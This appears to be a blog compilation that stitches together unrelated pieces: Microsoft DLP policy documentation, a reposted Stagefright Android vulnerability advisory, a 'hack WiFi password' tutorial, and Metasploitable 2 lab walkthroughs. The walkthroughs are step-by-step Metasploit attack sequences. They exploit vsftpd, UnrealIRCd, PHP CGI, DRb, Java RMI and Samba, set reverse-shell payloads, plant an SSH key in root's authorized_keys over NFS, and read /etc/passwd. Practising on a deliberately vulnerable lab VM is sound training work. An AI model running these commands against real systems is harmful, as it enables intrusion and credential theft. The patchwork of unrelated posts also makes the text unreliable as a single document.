Before you create your DLP policies, you might want to see what sensitive information already exists across your site collections. To do this, you create and run DLP queries in the eDiscovery Center.

Create DLP Query button

A DLP query works the same as an eDiscovery query. Based on which DLP template you choose, the DLP query is configured to search for specific types of sensitive information. First choose the locations you want to search, and then you can fine tune the query because it supports Keyword Query Language (KQL). In addition, you can narrow down the query by selecting a date range, specific authors, SharePoint property values, or locations. And just like an eDiscovery query, you can preview, export, and download the query results.

DLP query containing sensitive information types

DLP policies

A DLP policy helps you identify, monitor, and automatically protect sensitive information that’s subject to common industry regulations. You choose what types of sensitive information to protect, and what actions to take when content containing such sensitive information is detected. A DLP policy can notify the compliance officer by sending an incident report, notify the user with a policy tip on the site, and optionally block access to the document for everyone but the site owner, content owner, and whoever last modified the document. Finally, the policy tip has an option to override the blocking action, so that people can continue to work with documents if they have a business justification or need to report a false positive.

You create and manage DLP policies in the Compliance Policy Center. Creating a DLP policy is a two-step process: first you create the DLP policy, and then you assign the policy to a site collection.

Compliance Policy Center

Step 1: Creating a DLP policy

When you create a DLP policy, you choose a DLP template that looks for the types of sensitive information that you need to identify, monitor, and automatically protect.

New DLP Policy page

When a DLP policy finds content that includes the minimum number of instances of a specific type of sensitive information that you choose – for example, five credit card numbers, or a single social security number – then the DLP policy can automatically protect the sensitive information by taking the following actions:

  • Sending an incident report to the people you choose (such as your compliance officer) with details of the event. This report includes details about the detected content such as the title, document owner, and what sensitive information was detected. To send incident reports, you need to configure outgoing e-mail settings in Central Administration.
  • Notifying the user with a policy tip when documents that contain sensitive information are saved or edited. The policy tip explains why that document conflicts with a DLP policy, so that people can take remedial action, such as removing the sensitive information from the document. When the document is in compliance, the policy tip disappears.
  • Blocking access to the content for everyone except the site owner, document owner, and person who last modified the document. These people can remove the sensitive information from the document or take other remedial action. When the document is in compliance, the original permissions will be automatically restored. It’s important to understand that the policy tip gives people the option to override the blocking action. Policy tips can thus help educate users about your DLP policies and enforce them without preventing people from doing their work.

    Policy tip showing blocked access to document

Step 2: Assigning a DLP policy

After you create a DLP policy, you need to assign it to one or more site collections, where it can begin to help protect sensitive information in those locations. A single policy can be assigned to many site collections, but each assignment needs to be created one at a time.

Policy assignments for site collections

Policy tips

You want people in your organization who work with sensitive information to stay compliant with your DLP policies, but you don’t want to block them unnecessarily from getting their work done. This is where policy tips can help.

A policy tip is a notification or warning that appears when someone is working with content that conflicts with a DLP policy — for example, content like an Excel workbook that contains personally identifiable information (PII) and that’s saved to a site.

You can use policy tips to increase awareness and help educate people about your organization’s policies. Policy tips also give people the option to override the policy, so that they’re not blocked if they have a valid business need or if the policy is detecting a false positive.

Viewing or overriding a policy tip

To take action on a document, such as overriding the DLP policy or reporting a false positive, you can select the Open … menu for the item > View policy tip.

The policy tip lists the issues with the content, and you can choose Resolve, and then Override the policy tip or Report a false positive.

Policy tip for a document Overriding a policy tip

Details about how policy tips work

Note that it’s possible for content to match more than one DLP policy, but only the policy tip from the most restrictive, highest-priority policy will be shown. For example, a policy tip from a DLP policy that blocks access to content will be shown over a policy tip from a rule that simply notifies the user. This prevents people from seeing a cascade of policy tips. Also, if the policy tips in the most restrictive policy allow people to override the policy, then overriding this policy also overrides any other policies that the content matched.

DLP policies are synced to sites and contented is evaluated against them periodically and asynchronously (see the next section), so there may be a short delay between the time you create the DLP policy and the time you begin to see policy tips.

How DLP policies work

DLP detects sensitive information by using deep content analysis (not just a simple text scan). This deep content analysis uses keyword matches, the evaluation of regular expressions, internal functions, and other methods to detect content that matches your DLP policies. Potentially only a small percentage of your data is considered sensitive. A DLP policy can identify, monitor, and automatically protect just that data, without impeding or affecting people who work with the rest of your content.

After you create a DLP policy in the Compliance Policy Center, it’s stored as a policy definition in that site. Then, as you assign the policy to different site collections, the policy is synced to those locations, where it starts to evaluate content and enforce actions like sending incident reports, showing policy tips, and blocking access.

Policy evaluation in sites

Across all of your site collections, documents are constantly changing — they’re continually being created, edited, shared, and so on. This means documents can conflict or become compliant with a DLP policy at any time. For example, a person can upload a document that contains no sensitive information to their team site, but later, a different person can edit the same document and add sensitive information to it.

For this reason, DLP policies check documents for policy matches frequently in the background. You can think of this as asynchronous policy evaluation.

Here’s how it works. As people add or change documents in their sites, the search engine scans the content, so that you can search for it later. While this is happening, the content’s also scanned for sensitive information. Any sensitive information that’s found is stored securely in the search index, so that only the compliance team can access it, but not typical users. Each DLP policy that you’ve turned on runs in the background (asynchronously), checking search frequently for any content that matches a policy, and applying actions to protect it from inadvertent leaks.

Diagram showing how DLP policy evaluates content asynchronously

Finally, documents can conflict with a DLP policy, but they can also become compliant with a DLP policy. For example, if a person adds credit card numbers to a document, it might cause a DLP policy to block access to the document automatically. But if the person later removes the sensitive information, the action (in this case, blocking) is automatically undone the next time the document is evaluated against the policy.

DLP evaluates any content that can be indexed. For more information on what file types are crawled by default, see Default crawled file name extensions and parsed file types.

View DLP events in the usage logs

You can view DLP policy activity in the usage logs on the server running SharePoint Server 2016. For example, you can view the text entered by users when they override a policy tip or report a false positive.

First you need to turn on the option in Central Administration (Monitoring > Configure usage and health data collection > Simple Log Event Usage Data_SPUnifiedAuditEntry). For more information about usage logging, see Configure usage and health data collection.

Option to turn on DLP usage logs

After you turn on this feature, you can open the usage reports on the server and view the justifications provided by users for overriding a DLP policy tip, along with other DLP events.

Reason for user override in usage log

Before you get started with DLP

This topic outlines some of the features that DLP depends on. These include:

  • To detect and classify sensitive information in your site collections, start the search service and define a crawl schedule for your content.
  • Turn on out-going email.
  • To view user overrides and other DLP events, turn on the usage report.
  • Create the site collections:
    • For DLP queries, create the eDiscovery Center site collection.
    • For DLP policies, create the Compliance Policy Center site collection.
  • Create a security group for your compliance team, and then add security group to the Owners group in the eDiscovery Center or Compliance Policy Center.
  • To run DLP queries, view permissions are required for all content that the query will search – for more information, see Create a DLP query in SharePoint Server 2016.

More information

Data Loss Prevention (DLP) implementation in Office 365 – Part 2

What the DLP policy templates include?

Data loss prevention (DLP) in the Office 365 Security & Compliance Center includes ready-to-use policy templates that address common compliance requirements, such as helping you to protect sensitive information subject to the U.S. Health Insurance Act (HIPAA), U.S. Gramm-Leach-Bliley Act (GLBA), or U.S. Patriot Act. This topic lists all of the policy templates, what types of sensitive information they look for, and what the default conditions and actions are. This topic does not include every detail of how each policy template is configured; instead, the topic presents with you enough information to help you decide which template is the best starting point for your scenario. Remember, you can customize these policy templates to meet your specific requirements.

PCI Data Security Standard (PCI DSS)
Rule name Conditions

(including sensitive information types)

Actions
PCI DSS: Scan content shared outside – low count Content contains sensitive information:

  • Credit Card Number — Min count 1, Max count 9

Content is shared with:

  • People outside my organization
Send a notification
PCI DSS: Scan content shared outside – high count Content contains sensitive information:

  • Credit Card Number — Min count 10, Max count any

Content is shared with:

  • People outside my organization
Block access to content

Send a notification

  • Allow override
  • Require business justification

Send incident report

For more details on what DLP policy template includes visit here.

View the reports for data loss prevention

After you create your data loss prevention (DLP) policies, you’ll want to verify that they’re working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they’re trending up or down over time; filter the report in different ways; and view additional details by selecting a point on a line on the graph.

You can use the DLP reports to:

  • Focus on specific time periods and understand the reasons for spikes and trends.
  • Discover business processes that violate your organization’s DLP policies.
  • Understand any business impact of the DLP policies.
  • View the justifications submitted by users when they resolve a policy tip by overriding the policy or reporting a false positive.
  • Verify compliance with a specific DLP policy by showing any matches for that policy.
  • View a list of files with sensitive data that matches your DLP policies in the details pane.

In addition, you can use the DLP reports to fine tune your DLP policies as you run them in test mode.

DLP report showing policy matches

View the DLP reports

  1. Office 365 admin center.
  2. Navigate to Admin centers > Security & Compliance. You’re now in the Office 365Security & Compliance Center.
  3. Navigate to Reports > View reports. Under Data loss prevention (DLP), go to either DLP policy and rule matches or DLP false positives and overrides.

    Reports page in the Office 365 Security & Compliance Center

  4. You can filter the reports by date, location, and policy or rule.

    DLP report showing options to filter

  5. If you choose the DLP policy and rule matches report, select a point on a line on the graph to view details about matches.

    The details pane appears below the graph. Here you can view:

    • The specific rule and action that matched the content.
    • The file name and path of content that matched the rule.
    • Who last modified the content.
    • What types and count of sensitive information were detected.

    Note: A match is logged only the first time a file matches a rule. But if you edit a rule in a DLP policy, a newer version of the rule is created, so another match will be logged if the file matches the new version of the rule.

    DLP report with details pane below the chart

  6. If you choose the DLP false positives and overrides report, select a point on a line on the graph to view details about overrides or false positives.

    The details pane appears below the graph. Here you can view:

    • The specific rule that matched the content.
    • The file name and path of content that matched the rule.
    • Who last modified the content.
    • What types and count of sensitive information were detected.
    • The justifications submitted by users when they resolved a policy tip.

    DLP false positives and overrides report showing user justification text

Find the cmdlets for the DLP reports

To use most of the cmdlets for the Security & Compliance Center, you need to:

  1. Connect to the Office 365 Security & Compliance Center using remote PowerShell
  2. Use any of these Office 365 Security & Compliance Center cmdlets

However, DLP reports need pull data from across Office 365, including Exchange Online. For this reason, the cmdlets for the DLP reports are available in Exchange Online Powershell—not in Security & Compliance Center Powershell. Therefore, to use the cmdlets for the DLP reports, you need to:

  1. Connect to Exchange Online using remote PowerShell
  2. Use any of these cmdlets for the DLP reports:

Send email notifications and show policy tips for DLP policies

You can use a data loss prevention (DLP) policy to identify, monitor, and protect sensitive information across Office 365. You want people in your organization who work with this sensitive information to stay compliant with your DLP policies, but you don’t want to block them unnecessarily from getting their work done. This is where email notifications and policy tips can help.

Message bar shows policy tip in Excel 2016

A policy tip is a notification or warning that appears when someone is working with content that conflicts with a DLP policy—for example, content like an Excel workbook on a OneDrive for Business site that contains personally identifiable information (PII) and is shared with an external user.

You can use email notifications and policy tips to increase awareness and help educate people about your organization’s policies. You can also give people the option to override the policy, so that they’re not blocked if they have a valid business need or if the policy is detecting a false positive.

In the Office 365 Security & Compliance Center, when you create a DLP policy, you can configure the user notifications to:

  • Send an email notification to the people you choose that describes the issue.
  • Display a policy tip for content that conflicts with the DLP policy:
    • For email in Outlook on the web and Outlook 2013 and later, the policy tip appears at the top of a message above the recipients while the message is being composed.
    • For documents in a OneDrive for Business account or SharePoint Online site, the policy tip is indicated by a warning icon that appears on the item. To view more information, you can select an item and then choose Information Information pane icon in the upper-right corner of the page to open the details pane.
    • For Excel 2016, PowerPoint 2016, and Word 2016 documents that are stored on a OneDrive for Business site or SharePoint Online site that’s included in the DLP policy, the policy tip appears on the Message Bar and the Backstage view (File menu > Info).

Add user notifications to a DLP policy

When you create a DLP policy, both email notifications and policy tips are part of the User notifications section.

  1. Go to https://protection.office.com.
  2. Sign in to Office 365 using your work or school account. You’re now in the Office 365 Security & Compliance Center.
  3. In the Security & Compliance Center > left navigation > Data loss prevention > Policy > + Create a policy.

    Create a policy button

  4. Choose the DLP policy template that protects the types of sensitive information that you need > Next.

    To start with an empty template, choose Custom > Custom policy > Next.

  5. Name the policy > Next.
  6. To choose the locations that you want the DLP policy to protect, do one of the following:
    • Choose All locations in Office 365 > Next.
    • Choose Let me choose specific locations > Next.

      To include or exclude an entire location such as all Exchange email or all OneDrive accounts, switch the Status of that location on or off.

      To include only specific SharePoint sites or OneDrive accounts, switch the Status to on, and then click the links under Include to choose specific sites or accounts.

  7. Choose Use advanced settings >Next.
  8. Choose + New rule.
  9. In the rule editor, under User notifications, switch the status on.

    User notifications section of rule editor

Options for configuring email notifications

For each rule in a DLP policy, you can:

  • Send the notification to the people you choose. These people can include the owner of the content, the person who last modified the content, the owner of the site where the content is stored, or a specific user.
  • Customize the text that’s included in the notification by using HTML or tokens. See the section below for more information.

Notes:

  • Email notifications can be sent only to individual recipients—not groups or distribution lists.
  • Only new content will trigger an email notification. Editing existing content will trigger policy tips but not an email notification.

Email notification options

Default email notification

Notifications have a Subject line that begins with the action taken, such as “Notification”, “Message Blocked” for email, or “Access Blocked” for documents. If the notification is about a document, the notification message body includes a link that takes you to the site where the document’s stored and opens the policy tip for the document, where you can resolve any issues (see the section below about policy tips). If the notification is about a message, the notification includes as an attachment the message that matches a DLP policy.

Notification message

By default, notifications display text similar to the following for an item on a site. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… Then the default notification for SharePoint or OneDrive for Business documents says this… Then the default notification for Outlook messages says this…
Sends a notification but doesn’t allow override This item conflicts with a policy in your organization. Your email message conflicts with a policy in your organization.
Blocks access, sends a notification, and allows override This item conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked. Your email message conflicts with a policy in your organization. The message wasn’t delivered to all recipients.
Blocks access and sends a notification This item conflicts with a policy in your organization. Access to this item is blocked for everyone except its owner, last modifier, and the primary site collection administrator. Your email message conflicts with a policy in your organization. The message wasn’t delivered to all recipients.

Custom email notification

You can create a custom email notification instead of sending the default email notification to your end users or admins. The custom email notification supports HTML and has a 5,000-character limit. You can use HTML to include images, formatting, and other branding in the notification.

You can also use the following tokens to help customize the email notification. These tokens are variables that are replaced by specific information in the notification that’s sent.

Token Description
%%AppliedActions%% The actions applied to the content.
%%ContentURL%% The URL of the document on the SharePoint Online site or OneDrive for Business site.
%%MatchedConditions%% The conditions that were matched by the content. Use this token to inform people of possible issues with the content.

Notification message showing where tokens appear

Options for configuring policy tips

For each rule in a DLP policy, you can configure policy tips to:

  • Simply notify the person that the content conflicts with a DLP policy, so that they can take action to resolve the conflict. You can use the default text (see the tables below) or enter custom text about your organization’s specific policies.
  • Allow the person to override the DLP policy. Optionally, you can:
    • Require the person to enter a business justification for overriding the policy. This information is logged and you can view it in the DLP reports in the Reports section of the Security & Compliance Center.
    • Allow the person to report a false positive and override the DLP policy. This information is also logged for reporting, so that you can use false positives to fine tune your rules.

Policy tip options

For example, you may have a DLP policy applied to OneDrive for Business sites that detects personally identifiable information (PII), and this policy has three rules:

  1. First rule: If fewer than five instances of this sensitive information are detected in a document, and the document is shared with people inside the organization, the Send a notification action displays a policy tip. For policy tips, no override options are necessary because this rule is simply notifying people and not blocking access.
  2. Second rule: If greater than five instances of this sensitive information are detected in a document, and the document is shared with people inside the organization, the Block access to content action restricts the permissions for the file, and the Send a notification action allows people to override the actions in this rule by providing a business justification. Your organization’s business sometimes requires internal people to share PII data, and you don’t want your DLP policy to block this work.
  3. Third rule: If greater than five instances of this sensitive information are detected in a document, and the document is shared with people outside the organization, the Block access to content action restricts the permissions for the file, and the Send a notification action does not allow people to override the actions in this rule because the information is shared externally. Under no circumstances should people in your organization be allowed to share PII data outside the organization.

Here are some fine points to understand about using a policy tip to override a rule:

  • The option to override is per rule, and it overrides all of the actions in the rule (except sending a notification, which can’t be overridden).
  • It’s possible for content to match several rules in a DLP policy, but only the policy tip from the most restrictive, highest-priority rule will be shown. For example, a policy tip from a rule that blocks access to content will be shown over a policy tip from a rule that simply sends a notification. This prevents people from seeing a cascade of policy tips.
  • If the policy tips in the most restrictive rule allow people to override the rule, then overriding this rule also overrides any other rules that the content matched.

Policy tips on OneDrive for Business sites and SharePoint Online sites

When a document on a OneDrive for Business site or SharePoint Online site matches a rule in a DLP policy, and that rule uses policy tips, the policy tips display special icons on the document:

  1. If the rule sends a notification about the file, the warning icon appears.
  2. If the rule blocks access to the document, the blocked icon appears.

Policy tip icons on documents in a OneDrive account

To take action on a document, you can select an item > choose Information Information pane icon in the upper-right corner of the page to open the details pane > View policy tip.

The policy tip lists the issues with the content, and if the policy tips are configured with these options, you can choose Resolve, and then Override the policy tip or Report a false positive.

Information pane showing policy tip

Policy tip with option to override

DLP policies are synced to sites and contented is evaluated against them periodically and asynchronously, so there may be a short delay between the time you create the DLP policy and the time you begin to see policy tips. There may be a similar delay from when you resolve or override a policy tip to when the icon on the document on the site goes away.

Default text for policy tips on sites

By default, policy tips display text similar to the following for an item on a site. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… Then the default policy tip says this…
Sends a notification but doesn’t allow override This item conflicts with a policy in your organization.
Blocks access, sends a notification, and allows override This item conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked.
Blocks access and sends a notification This item conflicts with a policy in your organization. Access to this item is blocked for everyone except its owner, last modifier, and the primary site collection administrator.

Custom text for policy tips on sites

You can customize the text for policy tips separately from the email notification. Unlike custom text for email notifications (see above section), custom text for policy tips does not accept HTML or tokens. Instead, custom text for policy tips is plain text only with a 256-character limit.

Policy tips in Outlook on the web and Outlook 2013 and later

When you compose a new email in Outlook on the web and Outlook 2013 and later, you’ll see a policy tip if you add content that matches a rule in a DLP policy, and that rule uses policy tips. The policy tip appears at the top of the message, above the recipients, while the message is being composed.

Policy tip at the top of a message being composed

Policy tips work whether the sensitive information appears in the message body, subject line, or even a message attachment as shown here.

Policy tip showing that an attachment conflicts with a DLP policy

If the policy tips are configured to allow override, you can choose Show Details > Override > enter a business justification or report a false positive > Override.

Policy tip in message expanded to show Override option

Policy tip dialog where you can override the policy tip

Note that when you add sensitive information to an email, there may be latency between when the sensitive information is added and when the policy tip appears.

Policy tips in the Exchange Admin Center vs. the Office 365 Security & Compliance Center

Policy tips can work either with DLP policies and mail flow rules created in the Exchange Admin Center, or with DLP policies created in the Office 365 Security & Compliance Center, but not both. This is because these policies are stored in different locations, but policy tips can draw only from a single location.

If you’ve configured policy tips in the Exchange Admin Center, any policy tips that you configure in the Office 365 Security & Compliance Center won’t appear to users in Outlook on the web and Outlook 2013 and later until you turn off the tips in the Exchange Admin Center. This ensures that your current Exchange transport rules will continue to work until you choose to switch over to the Office 365 Security & Compliance Center.

Note that while policy tips can draw only from a single location, email notifications are always sent, even if you’re using DLP policies in both the Office 365 Security & Compliance Center and the Exchange Admin Center.

Default text for policy tips in email

By default, policy tips display text similar to the following for email.

If the DLP policy rule does this… Then the default policy tip says this…
Sends a notification but doesn’t allow override Your email conflicts with a policy in your organization.
Blocks access, sends a notification, and allows override Your email conflicts with a policy in your organization.
Blocks access and sends a notification Your email conflicts with a policy in your organization.

Policy tips in Excel 2016, PowerPoint 2016, and Word 2016

When people work with sensitive content in the desktop versions of Excel 2016, PowerPoint 2016, and Word 2016, policy tips can notify them in real time that the content conflicts with a DLP policy. This requires that:

  • The Office document is stored on a OneDrive for Business site orSharePoint Online site.
  • The site is included in a DLP policy that’s configured to use policy tips.

These Office 2016 desktop programs automatically sync DLP policies directly from Office 365, and then scan your documents to ensure that they don’t conflict with your DLP policies and display policy tips in real time.

Depending on how you configure the policy tips in the DLP policy, people can choose to simply ignore the policy tip, override the policy with or without a business justification, or report a false positive.

Policy tips appear on the Message Bar.

Message bar shows policy tip in Excel 2016

And policy tips also appear in the Backstage view (on the File tab).

Backstage shows policy tip in Excel 2016

If policy tips in the DLP policy are configured with these options, you can choose Resolve to Override a policy tip or Report a false positive.

Options on policy tip in Backstage in Excel 2016

In each of these Office 2016 desktop programs, people can choose to turn off policy tips. If turned off, policy tips that are simple notifications will not appear on the Message Bar or Backstage view (on the File tab). However, policy tips about blocking and overriding will still appear, and they will still receive the email notification. In addition, turning off policy tips does not exempt the document from any DLP policies that have been applied to it.

Default text for policy tips in Excel 2016, PowerPoint 2016, and Word 2016

By default, policy tips display text similar to the following on the Message Bar and Backstage view of an open document. The notification text is configured separately for each rule, so the text that’s displayed differs depending on which rule is matched.

If the DLP policy rule does this… Then the default policy tip says this…
Sends a notification but doesn’t allow override This file conflicts with a policy in your organization. Go to the File menu for more information.
Blocks access, sends a notification, and allows override This file conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked. Go to the File menu for more information.
Blocks access and sends a notification This file conflicts with a policy in your organization. If you don’t resolve this conflict, access to this file might be blocked. Go to the File menu for more information.

Custom text for policy tips in Excel 2016, PowerPoint 2016, and Word 2016

You can customize the text for policy tips separately from the email notification. Unlike custom text for email notifications (see above section), custom text for policy tips does not accept HTML or tokens. Instead, custom text for policy tips is plain text only with a 256-character limit.

Experts Found a Unicorn in the Heart of Android

Gaining remote code execution privileges merely by having access to the mobile number? Enter Stagefright.

The targets for this kind of attack can be anyone from Prime ministers, govt. officials, company executives, security officers to IT managers. Enterprise Mobile Security

Built on tens of gigabytes of source code from the Android Open Source Project (AOSP), the leading smartphone operating system carries a scary code in its heart. Named Stagefright, it is a media library that processes several popular media formats. Since media processing is often time-sensitive, the library is implemented in native code (C++) that is more prone to memory corruption than memory-safe languages like Java.

Zimperium zLabs VP of Platform Research and Exploitation, Joshua J. Drake (@jduck), dived into the deepest corners of Android code and discovered what we believe to be the worst Android vulnerabilities discovered to date. These issues in Stagefright code critically expose 95% of Android devices, an estimated 950 million devices. Drake’s research, to be presented at Black Hat USA on August 5 and DEF CON 23 on August 7 found multiple remote code execution vulnerabilities that can be exploited using various methods, the worst of which requires no user-interaction.

Attackers only need your mobile number, using which they can remotely execute code via a specially crafted media file delivered via MMS. A fully weaponized successful attack could even delete the message before you see it. You will only see the notification. These vulnerabilities are extremely dangerous because they do not require that the victim take any action to be exploited. Unlike spear-phishing, where the victim needs to open a PDF file or a link sent by the attacker, this vulnerability can be triggered while you sleep. Before you wake up, the attacker will remove any signs of the device being compromised and you will continue your day as usual – with a trojaned phone.

These screenshots were taken on a Nexus 5 (hammerhead) running the latest version, Android Lollipop 5.1.1.

Mobile Security

Android and derivative devices after and including version 2.2 are vulnerable. Devices running Android versions prior to Jelly Bean (roughly 11% of devices) are at the worst risk due to inadequate exploit mitigations. If ‘Heartbleed’ from the PC era sends chill down your spine, this is much worse.

The Stagefright vulnerability was assigned with the following CVEs:

CVE-2015-1538
CVE-2015-1539
CVE-2015-3824
CVE-2015-3826
CVE-2015-3827
CVE-2015-3828
CVE-2015-3829

In this unique scenario, Zimperium not only reported the vulnerability to the Google teams, but also submitted patches. Considering severity of the problem, Google acted promptly and applied the patches to internal code branches within 48 hours, but unfortunately that’s only the beginning of what will be a very lengthy process of update deployment.

Remediation:

Zimperium’s advanced Enterprise Mobile Threat Protection solution, zIPS, protects its enterprise customers from Stagefright vulnerability.

For the mobile devices without zIPS protection, fixes for these issues require an OTA firmware update for all affected devices. Such updates for Android devices have traditionally taken a long time to reach users. Devices older than 18 months are unlikely to receive an update at all. We hope that members of the Android ecosystem will recognize the severity of these issues and take immediate action. In addition to fixing these individual issues, we hope they will also fix any business processes that prevent or slow the uptake of such fixes.

That said, two groups of users are already protected against all reported issues. Users of SilentCircle’s Blackphone have been protected against these issues as of the release of PrivatOS version 1.1.7. Mozilla’s Firefox, which is also affected, has included fixes for these issues since version 38. We applaud these vendors for prioritizing security and releasing patches for these issues quickly.

If you’re an end user or enterprise, contact your device manufacturer and/or carrier to ascertain whether or not your particular device has been updated the requisite patches. If you’re part of any of the various parties that ship derivative versions of Android that might be affected, we encourage you to reach out to obtain the patches from us directly.

Acknowledgements:

We would like to thank Google’s Android Security Team for taking these issues seriously, addressing them by including our patches in the Android Open Source Project, and coordinating with members of the Open Handset Alliance (OHA) to get the issues addressed in official Android compatible devices. Additionally, we’d like to thank Mozilla’s Firefox team and SilentCircle’s Blackphone team for shipping fixes in their respective software releases.
– See more at: http://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/#sthash.6Kj5siAd.dpuf

Hacking WiFi Password via CMD

First You need to find the WiFi around you who are broadcasting their SSID. This can be accessed via Wi-Fi profiles which we have done on below image.
1
After finding the targets just pick a target and find the details of the profiles of target Wi-Fi.
2
Now, view the key via key request with clear text.
3

This process can be done the Wi-Fi networks around you. This tutorial is created for the educational purpose only, use at your own risk.

Metasploitable 2 lab-2

Hacking UNIX FTP Server via VSFTP:
Run BackTrack or Kali Linux
Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 21
(You will find if there is a FTP on target and port 21 is open)
 Msf>Search vsftp
(Available exploits will be shown)
 Msf> use exploit/unix/ftp/vsftp_234_backdoor
 Msf> info exploit/unix/ftp/vsftp_234_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get available payloads)
 Msf> set payload cmd/unix/interact
 Msf> exploit
(Game over your target victim is under your control and victim’s terminal shell)
You can run the following commands on victim shell

Id
Uname –a
Ifconfig
Whoami
Cat /etc/passwd
Exit and exit again

Hacking UNIX Server via Unreal lRCD 3.2.8.1 backdoor:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
Run the following commands
 Msf> nmap –sV –p 6667
(You will find if there is Unreal ircd on target and port 6667 is open)
 Msf>Search unrealircd
(Available exploits will be shown)
 Msf> use exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> info exploit/unix/irc/unreal_ircd_3281_backdoor
 Msf> show options
 Msf> set RHOST
 Msf> show payloads
(You will get list of all available payloads)
 Msf> exploit


Hacking Web Server via PHP CGI Argument Injection:
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 80
(You will find if there is an Apache httpd 2.2.8 ((Ubuntu) DAV/2) on target and port 80 is open)
Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/
(You will get PHP MyAdmin page and if you type Type IP address of vulnerable web server like http://192.168.132.9/phpmyadmin/?-s it will show server side coding)

 Msf>Search php_cgi
(Available exploits will be shown)
 Msf> info exploit/multi/http/php_cgi_arg_injection
 Msf> use exploit/multi/http/php_cgi_arg_injection
 Msf> show payloads
(You will get list of all available payloads)
 Msf> set payload php/meterpreter/reverse_tcp
 Msf> show options
 Msf> set RHOST (if require)
 Msf> set LHOST (if require)
 Msf> exploit
You will get meterpreter session on which you can run several remote shell commands like below.
Sysinfo
Ls
Cat index.php
(You can now see the source codes for index.php. GAME OVER)


DRuby Distributed Ruby Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something unknown on target and port 8787/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search drb
 Msf> info exploit/linux/misc/drb_remote_codeexec
 Msf> use exploit/linux/misc/drb_remote_codeexec
 Msf> show payloads
 Msf> set payload cmd/unix/reverse
 Msf> show options
 Msf> set URI druby://:8787
 Msf> set LHOST
 Msf> exploit
(Game over) you can type following commands in remote host session
id
uname –a
Ifconfig
whoami
Press Ctrl+C and y to abort the session

Java RMI Server – Java Code Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something rmiregistry on target and port 1099/tcp is open)
Msf>amap 8787
(You can see ruby and druby service is running)
 Msf> search rmiregistry
 Msf> info exploit/multi/misc/java_rmi_server
 Msf> use exploit/multi/misc/java_rmi_server
 Msf> show payloads
 Msf> show options
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
Sysinfo
Shell
id
uname –a
Ifconfig
Whoami
cat /et/passwd
type exit and exit again to abort the session


Samba -username map script- Remote Command Execution
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 Msf> nmap –sV –p 0-65535
(You will find something netbios-ssn on target and port 139/tcp is open)
 Msf> search samba
 Msf> info exploit/multi/samba/usermap_script
 Msf> use exploit/multi/ samba/usermap_script
 Msf> set RHOST
 Msf> exploit
(Game over) you will get meterpreter session and can type following commands in remote host session
id
uname –a
Ifconfig
Whoami
cat /et/passwd
Press Ctrl+ C then type Y and exit again to abort the session

NFS Misconfiguration – Access via SSH
 Run BackTrack or Kali Linux
 Open terminal and run Metasploit msfconsole or run from backtrack menu
 Run the following commands
 nmap –sV –p 0-65535
(You will find something on target like port ssh 22/tcp, rpcbind 111/tcp and nfs 2049/tcp is open)
 ssh root@
(You will get permission denied publickey, password message)
 rpcinfo –p
(you will get all nfs information related to version 2, 3, and 4)
 showmount –e
(You can see Export list for <target IP address)
 ssh-keygen (This will generate a fake publickey to broadcast)
 mkdir /tmp/test
 mount –t nfs :/ /tmp/test/ -o nolock
 cat ~/.ssh/id_rsa.pub >> /tmp/test/root/.ssh/authorized_keys
 unmounts /tmp/test/
 ssh root@
(You will see the NFS share of remote server and system information)
Ifconfig
id
uname –a
Whoami
cat /et/passwd
type exit and exit again to abort the session

Caution: do not use this for any illegal activity and if done you and only you will be responsible for that.

Metasploitable 2 lab

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link .)

This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

Getting Started

After the virtual machine boots, login to console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

msfadmin@metasploitable:~$ ifconfig

eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1

inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

Services

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The following command line will scan all TCP ports on the Metasploitable 2 instance:

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT

Nmap scan report for 192.168.99.131

Host is up (0.00028s latency).

